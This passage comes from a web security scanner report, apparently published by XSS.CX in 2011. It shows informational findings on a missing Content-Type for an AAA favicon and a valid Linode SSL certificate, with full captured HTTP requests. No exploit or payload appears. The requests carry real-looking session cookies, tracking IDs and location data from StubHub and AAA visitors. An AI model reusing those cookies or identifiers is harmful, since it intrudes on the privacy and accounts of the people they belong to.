STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E07%2F19%2F2011%7Clname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E07%2F19%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E07%2F19%2F2011%7Cutype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E07%2F19%2F2011%7Cstub_sid%7E%5E%7E3186517046%7E%5E%7E07%2F19%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E07%2F19%2F2011%7Cotconf%7E%5E%7E8z3dh05a8qE%3D%7E%5E%7E07%2F19%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E07%2F19%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Czcode%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cfname%7E%5E%7E%7E%5E%7E07%2F19%2F2011; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E804700%2C911274%7E%5E%7E06%2F19%2F2011; mbox=PC#1308447436655-203098.17#1345314947|check#true#1311100607|session#1311100546147-926694#1311102407; fsr.s={"cp":{"userid":"","pagetype":"Browse_event","url":"http://www.stubhub.com/?ticket_id=303237644&GCID=C12289x970&quantity_selected=2&gtkw=-640518298","genre":"U2 Tickets","genreid":"602","event":"U2 with Interpol Tickets (Rescheduled from 7/19/2010)","eventid":"906484","genreparentid":"602","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$62.00'","fee":"","TT_variant":""}}; TLTHID=E8A4044AB23510B2043FC687D11520A8; s_pers=%20s_nr%3D1311100550187-Repeat%7C1345228550187%3B%20currentCTC%3DC12289x970%7C1313692550208%3B%20s_cpm%3D%255B%255B'RF%25253A%252520burp'%252C'1308567426317'%255D%252C%255B'C12289x970'%252C'1311100550213'%255D%255D%7C1468953350213%3B%20currentCVP%3DRF%253A%2520burp%253EC12289x970%7C1313692550219%3B%20s_ev41%3D%255B%255B'6%252F20%252F2011%25252010%25253A57%252520AM'%252C'1308567426321'%255D%252C%255B'7%252F19%252F2011%2525206%25253A35%252520PM'%252C'1311100550224'%255D%255D%7C1468953350224%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; fsr.a=1311100552198; bn_u=6923598397700396013

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:36:26 GMT
Server: Apache
Set-Cookie: TLTHID=02B35B92B23610B2CDDBD1ECACF16CE8; Path=/; Domain=.stubhub.com
Last-Modified: Thu, 23 Mar 2006 01:37:46 GMT
Accept-Ranges: bytes
Content-Length: 1406
Content-Type: text/plain

..............h.......(....... ........................................V...............3...33..3f..3...3...3...f...f3..ff..f...f...f........3...f...................3...f...................3...f.......
...[SNIP]...

30. Content type is not specified  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nne.aaa.com
Path:   /favicon.ico

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

GET /favicon.ico HTTP/1.1
Host: www.nne.aaa.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: zipcode=05672|AAA|36; acezipcode=36|AAA|05672; surveysessioncookie=surveysessioncookie.showsurvey=NO; CP=null*; CT_CID=DIRECT; CT_KWD=; CT_AD=; CT_ADGROUP=; CT_MATCH=; CT_REF=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue; CT_TestId=0; CT_Plmnt=; CT_ENTRYURL=http%3A//www.nne.aaa.com/en-nne/Pages/Home.aspx%3Fzip%3D05672%26referer%3Dwww.aaa.com; CT_CrtDate=7/19/2011%2014%3A4%3A44; CT_UID=1311102284607.1287; CT_Type=1; __utma=169044862.685047069.1311102284.1311102284.1311102284.1; __utmb=169044862.1.10.1311102284; __utmc=169044862; __utmz=169044862.1311102284.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1311102284568%7C1313694284568%3B

Response

HTTP/1.1 404 NOT FOUND
Date: Tue, 19 Jul 2011 19:04:44 GMT
Server: Microsoft-IIS/6.0
ACSC: WEB04
X-Powered-By: ASP.NET
Exires: Mon, 04 Jul 2011 19:04:44 GMT
Cache-Control: private,max-age=0
Content-Length: 13
Public-Extension: http://schemas.microsoft.com/repl-2

404 NOT FOUND

31. SSL certificate  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   https://manager.linode.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.linode.com
Issued by:  Equifax Secure Certificate Authority
Valid from:  Mon May 03 14:39:54 CDT 2010
Valid to:  Thu Jul 04 17:58:12 CDT 2013

Certificate chain #1

Issued to:  Equifax Secure Certificate Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Aug 22 11:41:51 CDT 1998
Valid to:  Wed Aug 22 11:41:51 CDT 2018

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.

Report generated by XSS.CX at Wed Jul 20 07:45:44 CDT 2011.